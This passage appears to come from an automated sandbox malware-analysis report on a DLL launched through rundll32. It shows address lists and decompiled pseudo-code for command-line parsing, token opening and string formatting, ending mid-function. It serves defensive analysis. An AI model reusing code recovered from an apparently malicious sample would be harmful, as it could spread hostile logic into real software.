                                                                                                                                                                                                                                                                            0x10014d57
                                                                                                                                                                                                                                                                            0x10014d59
                                                                                                                                                                                                                                                                            0x10014d66
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014d66
                                                                                                                                                                                                                                                                            0x10014d59
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014d55
                                                                                                                                                                                                                                                                            0x10014e39
                                                                                                                                                                                                                                                                            0x10014e3e
                                                                                                                                                                                                                                                                            0x10014e41
                                                                                                                                                                                                                                                                            0x10014e44
                                                                                                                                                                                                                                                                            0x10014eef
                                                                                                                                                                                                                                                                            0x10014eef
                                                                                                                                                                                                                                                                            0x10014e4a
                                                                                                                                                                                                                                                                            0x10014e4a
                                                                                                                                                                                                                                                                            0x10014e4a
                                                                                                                                                                                                                                                                            0x10014e4f
                                                                                                                                                                                                                                                                            0x10014e79
                                                                                                                                                                                                                                                                            0x10014e7c
                                                                                                                                                                                                                                                                            0x10014e7c
                                                                                                                                                                                                                                                                            0x10014e81
                                                                                                                                                                                                                                                                            0x10014e83
                                                                                                                                                                                                                                                                            0x10014e85
                                                                                                                                                                                                                                                                            0x10014e88
                                                                                                                                                                                                                                                                            0x10014e8b
                                                                                                                                                                                                                                                                            0x10014e93
                                                                                                                                                                                                                                                                            0x10014e98
                                                                                                                                                                                                                                                                            0x10014e98
                                                                                                                                                                                                                                                                            0x10014e9e
                                                                                                                                                                                                                                                                            0x10014ea1
                                                                                                                                                                                                                                                                            0x10014ea4
                                                                                                                                                                                                                                                                            0x10014ea7
                                                                                                                                                                                                                                                                            0x10014ea9
                                                                                                                                                                                                                                                                            0x10014ea9
                                                                                                                                                                                                                                                                            0x10014eaa
                                                                                                                                                                                                                                                                            0x10014eaa
                                                                                                                                                                                                                                                                            0x10014ea7
                                                                                                                                                                                                                                                                            0x10014eb8
                                                                                                                                                                                                                                                                            0x10014ebb
                                                                                                                                                                                                                                                                            0x10014ebf
                                                                                                                                                                                                                                                                            0x10014ec4
                                                                                                                                                                                                                                                                            0x10014ec7
                                                                                                                                                                                                                                                                            0x10014eca
                                                                                                                                                                                                                                                                            0x10014eca
                                                                                                                                                                                                                                                                            0x10014eca
                                                                                                                                                                                                                                                                            0x10014ecd
                                                                                                                                                                                                                                                                            0x10014ecd
                                                                                                                                                                                                                                                                            0x10014ed0
                                                                                                                                                                                                                                                                            0x10014ed0
                                                                                                                                                                                                                                                                            0x10014e51
                                                                                                                                                                                                                                                                            0x10014e51
                                                                                                                                                                                                                                                                            0x10014e61
                                                                                                                                                                                                                                                                            0x10014e64
                                                                                                                                                                                                                                                                            0x10014e69
                                                                                                                                                                                                                                                                            0x10014e69
                                                                                                                                                                                                                                                                            0x10014e6c
                                                                                                                                                                                                                                                                            0x10014e6f
                                                                                                                                                                                                                                                                            0x10014e72
                                                                                                                                                                                                                                                                            0x10014e74
                                                                                                                                                                                                                                                                            0x10014e74
                                                                                                                                                                                                                                                                            0x10014ed3
                                                                                                                                                                                                                                                                            0x10014ed5
                                                                                                                                                                                                                                                                            0x10014ed8
                                                                                                                                                                                                                                                                            0x10014ed8
                                                                                                                                                                                                                                                                            0x10014ede
                                                                                                                                                                                                                                                                            0x10014ee2
                                                                                                                                                                                                                                                                            0x10014ee5
                                                                                                                                                                                                                                                                            0x10014ee7
                                                                                                                                                                                                                                                                            0x10014ee7
                                                                                                                                                                                                                                                                            0x10014ef8
                                                                                                                                                                                                                                                                            0x10014efa
                                                                                                                                                                                                                                                                            0x10014efa
                                                                                                                                                                                                                                                                            0x10014f02
                                                                                                                                                                                                                                                                            0x10014f10
                                                                                                                                                                                                                                                                            0x10014f13
                                                                                                                                                                                                                                                                            0x10014f15
                                                                                                                                                                                                                                                                            0x10014f35
                                                                                                                                                                                                                                                                            0x10014f35
                                                                                                                                                                                                                                                                            0x10014f38
                                                                                                                                                                                                                                                                            0x10014f3e
                                                                                                                                                                                                                                                                            0x10014f3f
                                                                                                                                                                                                                                                                            0x10014f42
                                                                                                                                                                                                                                                                            0x10014f44
                                                                                                                                                                                                                                                                            0x10014f47
                                                                                                                                                                                                                                                                            0x10014f4a
                                                                                                                                                                                                                                                                            0x10014f4d
                                                                                                                                                                                                                                                                            0x10014f51
                                                                                                                                                                                                                                                                            0x10014f54
                                                                                                                                                                                                                                                                            0x10014f57
                                                                                                                                                                                                                                                                            0x10014f5a
                                                                                                                                                                                                                                                                            0x10014f5c
                                                                                                                                                                                                                                                                            0x10014f5c
                                                                                                                                                                                                                                                                            0x10014f5f
                                                                                                                                                                                                                                                                            0x10014f61
                                                                                                                                                                                                                                                                            0x10014f61
                                                                                                                                                                                                                                                                            0x10014f64
                                                                                                                                                                                                                                                                            0x10014f66
                                                                                                                                                                                                                                                                            0x10014f69
                                                                                                                                                                                                                                                                            0x10014f71
                                                                                                                                                                                                                                                                            0x10014f74
                                                                                                                                                                                                                                                                            0x10014f79
                                                                                                                                                                                                                                                                            0x10014f79
                                                                                                                                                                                                                                                                            0x10014f7f
                                                                                                                                                                                                                                                                            0x10014f82
                                                                                                                                                                                                                                                                            0x10014f85
                                                                                                                                                                                                                                                                            0x10014f87
                                                                                                                                                                                                                                                                            0x10014f87
                                                                                                                                                                                                                                                                            0x10014f88
                                                                                                                                                                                                                                                                            0x10014f88
                                                                                                                                                                                                                                                                            0x10014f93
                                                                                                                                                                                                                                                                            0x10014f93
                                                                                                                                                                                                                                                                            0x10014f93
                                                                                                                                                                                                                                                                            0x10014f96
                                                                                                                                                                                                                                                                            0x10014f99
                                                                                                                                                                                                                                                                            0x10014f99
                                                                                                                                                                                                                                                                            0x10014f9c
                                                                                                                                                                                                                                                                            0x10014f9c
                                                                                                                                                                                                                                                                            0x10014f5f
                                                                                                                                                                                                                                                                            0x10014f9f
                                                                                                                                                                                                                                                                            0x10014fa2
                                                                                                                                                                                                                                                                            0x10014fa5
                                                                                                                                                                                                                                                                            0x10014fa7
                                                                                                                                                                                                                                                                            0x10014faa
                                                                                                                                                                                                                                                                            0x10014fac
                                                                                                                                                                                                                                                                            0x10014faf
                                                                                                                                                                                                                                                                            0x10014fb2
                                                                                                                                                                                                                                                                            0x10014fb4
                                                                                                                                                                                                                                                                            0x10014fb7
                                                                                                                                                                                                                                                                            0x10014fbf
                                                                                                                                                                                                                                                                            0x10014fc7
                                                                                                                                                                                                                                                                            0x10014fca
                                                                                                                                                                                                                                                                            0x10014fca
                                                                                                                                                                                                                                                                            0x10014fca
                                                                                                                                                                                                                                                                            0x10014fcd
                                                                                                                                                                                                                                                                            0x10014fcd
                                                                                                                                                                                                                                                                            0x10014fcd
                                                                                                                                                                                                                                                                            0x10014fd0
                                                                                                                                                                                                                                                                            0x10014fd6
                                                                                                                                                                                                                                                                            0x10014fd8
                                                                                                                                                                                                                                                                            0x10014fd8
                                                                                                                                                                                                                                                                            0x10014fde
                                                                                                                                                                                                                                                                            0x10014fe4
                                                                                                                                                                                                                                                                            0x10014fed
                                                                                                                                                                                                                                                                            0x10014ff4
                                                                                                                                                                                                                                                                            0x10014ff6
                                                                                                                                                                                                                                                                            0x10014ff9
                                                                                                                                                                                                                                                                            0x10014ff9
                                                                                                                                                                                                                                                                            0x10014ffc
                                                                                                                                                                                                                                                                            0x10014ffc
                                                                                                                                                                                                                                                                            0x10014fff
                                                                                                                                                                                                                                                                            0x10015001
                                                                                                                                                                                                                                                                            0x10015004
                                                                                                                                                                                                                                                                            0x10015006
                                                                                                                                                                                                                                                                            0x10015021
                                                                                                                                                                                                                                                                            0x10015021
                                                                                                                                                                                                                                                                            0x10015025
                                                                                                                                                                                                                                                                            0x10015028
                                                                                                                                                                                                                                                                            0x1001502b
                                                                                                                                                                                                                                                                            0x1001502e
                                                                                                                                                                                                                                                                            0x10015044
                                                                                                                                                                                                                                                                            0x10015044
                                                                                                                                                                                                                                                                            0x10015044
                                                                                                                                                                                                                                                                            0x10015030
                                                                                                                                                                                                                                                                            0x10015030
                                                                                                                                                                                                                                                                            0x10015032
                                                                                                                                                                                                                                                                            0x10015036
                                                                                                                                                                                                                                                                            0x10015039
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1001503b
                                                                                                                                                                                                                                                                            0x1001503b
                                                                                                                                                                                                                                                                            0x1001503d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1001503f
                                                                                                                                                                                                                                                                            0x1001503f
                                                                                                                                                                                                                                                                            0x1001503f
                                                                                                                                                                                                                                                                            0x1001503d
                                                                                                                                                                                                                                                                            0x10015039
                                                                                                                                                                                                                                                                            0x10015048
                                                                                                                                                                                                                                                                            0x1001504b
                                                                                                                                                                                                                                                                            0x10015050
                                                                                                                                                                                                                                                                            0x1001505a
                                                                                                                                                                                                                                                                            0x1001505a
                                                                                                                                                                                                                                                                            0x1001505a
                                                                                                                                                                                                                                                                            0x1001505d
                                                                                                                                                                                                                                                                            0x10015008
                                                                                                                                                                                                                                                                            0x10015008
                                                                                                                                                                                                                                                                            0x1001500a
                                                                                                                                                                                                                                                                            0x10015011
                                                                                                                                                                                                                                                                            0x10015011
                                                                                                                                                                                                                                                                            0x10015013
                                                                                                                                                                                                                                                                            0x10015015
                                                                                                                                                                                                                                                                            0x10015017
                                                                                                                                                                                                                                                                            0x1001501b
                                                                                                                                                                                                                                                                            0x1001501d
                                                                                                                                                                                                                                                                            0x1001501f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1001501f
                                                                                                                                                                                                                                                                            0x1001501b
                                                                                                                                                                                                                                                                            0x1001500c
                                                                                                                                                                                                                                                                            0x1001500c
                                                                                                                                                                                                                                                                            0x1001500f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1001500f
                                                                                                                                                                                                                                                                            0x1001500a
                                                                                                                                                                                                                                                                            0x10015067
                                                                                                                                                                                                                                                                            0x10015069
                                                                                                                                                                                                                                                                            0x10015069
                                                                                                                                                                                                                                                                            0x10015074
                                                                                                                                                                                                                                                                            0x10014f17
                                                                                                                                                                                                                                                                            0x10014f17
                                                                                                                                                                                                                                                                            0x10014f1a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014f1c
                                                                                                                                                                                                                                                                            0x10014f1c
                                                                                                                                                                                                                                                                            0x10014f1e
                                                                                                                                                                                                                                                                            0x10014f22
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014f24
                                                                                                                                                                                                                                                                            0x10014f24
                                                                                                                                                                                                                                                                            0x10014f24
                                                                                                                                                                                                                                                                            0x10014f27
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014f2b
                                                                                                                                                                                                                                                                            0x10014f34
                                                                                                                                                                                                                                                                            0x10014f34
                                                                                                                                                                                                                                                                            0x10014f27
                                                                                                                                                                                                                                                                            0x10014f22
                                                                                                                                                                                                                                                                            0x10014f1a
                                                                                                                                                                                                                                                                            0x10014f06
                                                                                                                                                                                                                                                                            0x10014f0f
                                                                                                                                                                                                                                                                            0x10014f0f

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcpy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                            • Opcode ID: 91640b19e7d0a89fb15d7722cf56a0f0eb65f90dc13b34d669ab98b2b0f7349b
                                                                                                                                                                                                                                                                            • Instruction ID: 608367cce7ce40668a14c070f4f8b38a81cfced9e19564bd56cf48f5647a2197
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91640b19e7d0a89fb15d7722cf56a0f0eb65f90dc13b34d669ab98b2b0f7349b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7ED10475600A059FCB24CF69D8C4A6AB7E5FF88344B25892DE88ACB711DB31F985CB50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                                            			E1000BA2B(intOrPtr __ecx) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				short* _v140;
                                                                                                                                                                                                                                                                            				intOrPtr _v144;
                                                                                                                                                                                                                                                                            				short _v664;
                                                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                                                            				signed int _t41;
                                                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                                                                                                                            				WCHAR* _t52;
                                                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                                                            				short* _t55;
                                                                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                                                            				_t54 = 0;
                                                                                                                                                                                                                                                                            				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                                                                                                                            				_t44 = _v8;
                                                                                                                                                                                                                                                                            				_t41 = 0;
                                                                                                                                                                                                                                                                            				_v12 = _t28;
                                                                                                                                                                                                                                                                            				if(_t44 <= 0) {
                                                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                                                            					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                                                                                                                            					__eflags = _t29;
                                                                                                                                                                                                                                                                            					return _t29;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					goto L1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            					L1:
                                                                                                                                                                                                                                                                            					_t52 =  *(_t28 + _t41 * 4);
                                                                                                                                                                                                                                                                            					_t30 =  *_t52 & 0x0000ffff;
                                                                                                                                                                                                                                                                            					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t54 < 0x20) {
                                                                                                                                                                                                                                                                            						 *(_t56 + _t54 * 4 - 0x8c) = _t52;
                                                                                                                                                                                                                                                                            						_t40 = lstrlenW(_t52);
                                                                                                                                                                                                                                                                            						_t45 = 0;
                                                                                                                                                                                                                                                                            						if(_t40 <= 0) {
                                                                                                                                                                                                                                                                            							L11:
                                                                                                                                                                                                                                                                            							_t44 = _v8;
                                                                                                                                                                                                                                                                            							_t54 = _t54 + 1;
                                                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                                            							L8:
                                                                                                                                                                                                                                                                            							if(_t52[_t45] == 0x2c) {
                                                                                                                                                                                                                                                                            								_t52[_t45] = 0;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                                                            						} while (_t45 < _t40);
                                                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                                            					_t28 = _v12;
                                                                                                                                                                                                                                                                            					_t41 = _t41 + 1;
                                                                                                                                                                                                                                                                            				} while (_t41 < _t44);
                                                                                                                                                                                                                                                                            				if(_t54 != 1) {
                                                                                                                                                                                                                                                                            					if(__eflags <= 0) {
                                                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t55 = _v140;
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					if( *_t55 == 0x5c ||  *((short*)(_t55 + 2)) == 0x3a) {
                                                                                                                                                                                                                                                                            						E1000C229(_v16, _t55, 0x104);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                                                            						_push(_t55);
                                                                                                                                                                                                                                                                            						_push("\\");
                                                                                                                                                                                                                                                                            						_v12 = E100099EC( &_v664);
                                                                                                                                                                                                                                                                            						E1000C229(_v16, _t36, 0x104);
                                                                                                                                                                                                                                                                            						E10009203( &_v12, 0xfffffffe);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t55 = _v144;
                                                                                                                                                                                                                                                                            				goto L17;
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x1000ba34
                                                                                                                                                                                                                                                                            0x1000ba3b
                                                                                                                                                                                                                                                                            0x1000ba3e
                                                                                                                                                                                                                                                                            0x1000ba4b
                                                                                                                                                                                                                                                                            0x1000ba51
                                                                                                                                                                                                                                                                            0x1000ba54
                                                                                                                                                                                                                                                                            0x1000ba56
                                                                                                                                                                                                                                                                            0x1000ba5b
                                                                                                                                                                                                                                                                            0x1000bb32
                                                                                                                                                                                                                                                                            0x1000bb32
                                                                                                                                                                                                                                                                            0x1000bb32
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000ba61
                                                                                                                                                                                                                                                                            0x1000ba61
                                                                                                                                                                                                                                                                            0x1000ba61
                                                                                                                                                                                                                                                                            0x1000ba64
                                                                                                                                                                                                                                                                            0x1000ba6a
                                                                                                                                                                                                                                                                            0x1000ba86
                                                                                                                                                                                                                                                                            0x1000ba8d
                                                                                                                                                                                                                                                                            0x1000ba93
                                                                                                                                                                                                                                                                            0x1000ba97
                                                                                                                                                                                                                                                                            0x1000baab
                                                                                                                                                                                                                                                                            0x1000baab
                                                                                                                                                                                                                                                                            0x1000baae
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000ba99
                                                                                                                                                                                                                                                                            0x1000ba99
                                                                                                                                                                                                                                                                            0x1000ba9e
                                                                                                                                                                                                                                                                            0x1000baa2
                                                                                                                                                                                                                                                                            0x1000baa2
                                                                                                                                                                                                                                                                            0x1000baa6
                                                                                                                                                                                                                                                                            0x1000baa7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000ba99
                                                                                                                                                                                                                                                                            0x1000baaf
                                                                                                                                                                                                                                                                            0x1000baaf
                                                                                                                                                                                                                                                                            0x1000bab2
                                                                                                                                                                                                                                                                            0x1000bab3
                                                                                                                                                                                                                                                                            0x1000baba
                                                                                                                                                                                                                                                                            0x1000bac4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000bac6
                                                                                                                                                                                                                                                                            0x1000bacc
                                                                                                                                                                                                                                                                            0x1000bad0
                                                                                                                                                                                                                                                                            0x1000bb28
                                                                                                                                                                                                                                                                            0x1000bad9
                                                                                                                                                                                                                                                                            0x1000bae6
                                                                                                                                                                                                                                                                            0x1000baec
                                                                                                                                                                                                                                                                            0x1000baee
                                                                                                                                                                                                                                                                            0x1000baf5
                                                                                                                                                                                                                                                                            0x1000bb06
                                                                                                                                                                                                                                                                            0x1000bb09
                                                                                                                                                                                                                                                                            0x1000bb14
                                                                                                                                                                                                                                                                            0x1000bb19
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000bb2e
                                                                                                                                                                                                                                                                            0x1000babc
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCommandLineW.KERNEL32(00000000,00000228,00000228), ref: 1000BA40
                                                                                                                                                                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 1000BA4B
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 1000BA8D
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 1000BAE6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CommandLine$ArgvCurrentDirectorylstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 159791187-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6aebfb5b06c6c39044bafa0a3afa5e56d5a16357a18df3b8b45862e1094ba118
                                                                                                                                                                                                                                                                            • Instruction ID: 1dfb13a73697d1065cdb57a4d8345c5b051b7baf3ee2abb54885a1e1bf2053b0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6aebfb5b06c6c39044bafa0a3afa5e56d5a16357a18df3b8b45862e1094ba118
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B431B375E00515AFEB14DF948885AADB7F8EF4A3D0F11845AD842E3198DB709E81CB62
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E1000DC3C(void* __ecx) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                                                            					_t10 = _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					if(GetLastError() != 0x3f0) {
                                                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                                                            						_t10 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t13 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x130))(), 8,  &_v8) != 0) {
                                                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t10;
                                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                                            0x1000dc5b
                                                                                                                                                                                                                                                                            0x1000dc8d
                                                                                                                                                                                                                                                                            0x1000dc8d
                                                                                                                                                                                                                                                                            0x1000dc5d
                                                                                                                                                                                                                                                                            0x1000dc68
                                                                                                                                                                                                                                                                            0x1000dc89
                                                                                                                                                                                                                                                                            0x1000dc89
                                                                                                                                                                                                                                                                            0x1000dc6a
                                                                                                                                                                                                                                                                            0x1000dc74
                                                                                                                                                                                                                                                                            0x1000dc87
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dc87
                                                                                                                                                                                                                                                                            0x1000dc68
                                                                                                                                                                                                                                                                            0x1000dc92

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 1000DC4F
                                                                                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC56
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,1000DD81,00000000,10000000), ref: 1000DC5D
                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC82
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1515895013-0
                                                                                                                                                                                                                                                                            • Opcode ID: b792e2a9ee284b098ae62641809742da31258a1248d596868d4d4808ebbd8cb3
                                                                                                                                                                                                                                                                            • Instruction ID: 0e5175ae539005769c67e2d26daef5d126bf47866e8b33fffce6e4c685f75d4f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b792e2a9ee284b098ae62641809742da31258a1248d596868d4d4808ebbd8cb3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34F0303164021AAFFB50EBA4CD89F5E77ECFB08380F150465F602D7491DA70E901DB60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                                                            			E1000A2EA(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                            				WCHAR* _v8;
                                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                                            				char _v140;
                                                                                                                                                                                                                                                                            				WCHAR* _t12;
                                                                                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                                                            				WCHAR* _t55;
                                                                                                                                                                                                                                                                            				char* _t56;
                                                                                                                                                                                                                                                                            				WCHAR* _t57;
                                                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t61;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                                                            				_t12 = E100091B2(__ecx, 0x152a);
                                                                                                                                                                                                                                                                            				_t58 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            				_t55 = _t12;
                                                                                                                                                                                                                                                                            				_t59 = _t58 + 0xb0;
                                                                                                                                                                                                                                                                            				_v8 = _t55;
                                                                                                                                                                                                                                                                            				E1000C172( &_v140, 0x40, L"%08x", E1000E6E9(_t59, E1000CF09(_t58 + 0xb0), 0));
